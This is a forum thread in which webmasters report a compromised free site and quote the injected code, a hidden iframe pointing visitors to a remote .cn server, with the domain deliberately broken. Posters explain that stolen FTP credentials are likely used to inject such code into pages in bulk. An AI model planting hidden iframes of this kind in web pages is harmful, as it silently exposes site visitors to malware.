![]() |
Trojan on freesite
I was checking some freesites submitted to me - and this one made my trojan alerter go nuts: http://paintortures.com/16-06/
Take care |
It is the main page that is the issue
Contains the following Code:
iframe src="http://meldor[inserted to kill link]group.cn:8080/ts/in.cgi?pepsi67" width=125 height=125 style="visibility: hidden" slavesinlove.com/cgi-bin/click.cgi?id=dejavu I know I've seen dejavu before... |
iframe after -- ftp account was most likely compromised.
|
Odd that it's not on all html pages... the index is clean... but the main page, the one that is less likely to get scanned by a linkbot has the code...
|
Quote:
|
Quote:
With the FTP exploit, a person's FTP user/password data is compromised and passed off to a cluster of machines. Those machines then go in with the FTP credentials and download every .html and .php file and replace with |